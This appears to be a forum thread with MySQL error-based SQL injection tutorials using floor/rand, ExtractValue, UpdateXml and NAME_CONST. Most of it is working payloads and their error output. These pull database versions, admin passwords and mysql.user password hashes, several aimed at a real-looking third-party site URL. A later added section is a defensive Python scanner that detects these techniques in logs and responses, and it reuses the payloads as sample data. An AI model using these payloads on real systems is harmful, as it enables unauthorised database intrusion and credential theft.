MySQL: three error-based injection methods using floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Error-based injection via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked in the error message. To query other data, replace the version() expression with another subquery.
For example, to query the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
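Every technique in this thread (floor/rand group-by collision, extractvalue, updatexml, name_const) has two observable sides a defender can key on: the request carries a distinctive function call, and the attack only succeeds if the verbose MySQL error text reaches the client. The Python below is an added example, not code from the thread or from either tutorial author; it classifies access-log requests by technique and flags MySQL error strings leaking into responses. It assumes Apache/nginx combined log format; the log lines and response bodies are constructed for the example, with the payloads and error messages taken from the post above.

```python
"""Detect MySQL error-based SQL injection attempts in web access logs and
spot the verbose MySQL errors those attempts depend on seeing in a response.
Added example; log lines and responses below are constructed test data."""
import re
from urllib.parse import unquote_plus

# Request-side signatures, one per technique discussed in the thread.
REQUEST_SIGNATURES = {
    "floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
}

# Response-side signatures: the MySQL error texts each technique needs echoed back.
# Quotes may be straight or curly depending on how the page rendered them.
RESPONSE_SIGNATURES = {
    "floor": re.compile(r"Duplicate entry ['\u2019](.*?)['\u2019] for key ['\u2019]group_key['\u2019]"),
    "xpath": re.compile(r"XPATH syntax error: ['\u2019](.*?)['\u2019]"),
    "name_const": re.compile(r"Duplicate column name ['\u2019](.*?)['\u2019]"),
}

# Combined log format: client ident user [time] "METHOD path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log; attack requests reuse the payloads shown in the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120
10.0.0.9 - - [11/Nov/2015:19:04:01 +0800] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 311
10.0.0.9 - - [11/Nov/2015:19:04:15 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 290
10.0.0.9 - - [11/Nov/2015:19:04:30 +0800] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x3a,(select%20user())),1)) HTTP/1.1" 500 287
10.0.0.9 - - [11/Nov/2015:19:04:44 +0800] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 305
10.0.0.7 - - [11/Nov/2015:19:05:02 +0800] "GET /article.php?id=2 HTTP/1.1" 200 4711
"""

# Constructed response bodies: the error texts from the thread plus a benign page.
SAMPLE_RESPONSES = [
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "Error: Duplicate column name '5.0.27-community-nt'",
    "<html><body>Article not found</body></html>",
]


def classify_request(raw_path):
    """Return the techniques whose request signature appears in a URL path.
    Payloads arrive percent- or plus-encoded, so decode before matching."""
    decoded = unquote_plus(raw_path)
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded)]


def classify_response(body):
    """Return (technique, leaked_value) pairs for MySQL errors echoed in a body.
    The leaked value tells incident triage what actually left the database."""
    hits = []
    for name, rx in RESPONSE_SIGNATURES.items():
        m = rx.search(body)
        if m:
            hits.append((name, m.group(1)))
    return hits


def scan_access_log(lines):
    """Parse log lines and report requests carrying an error-based signature."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        techniques = classify_request(m.group("path"))
        if techniques:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "path": m.group("path"),
                "status": int(m.group("status")),
                "techniques": techniques,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["status"], f["techniques"])
    for body in SAMPLE_RESPONSES:
        print(classify_response(body))
```

A request hit combined with a 500 status (or a response hit) is the strongest signal, because the technique only yields data when the database error is rendered to the client; the durable fix is parameterized queries plus a generic error page so MySQL's message never reaches the browser.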

1 }' U4 e( S3 O" s8 K) F2 ]* }
5 ]3 m, V* p; o9 k( F  o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表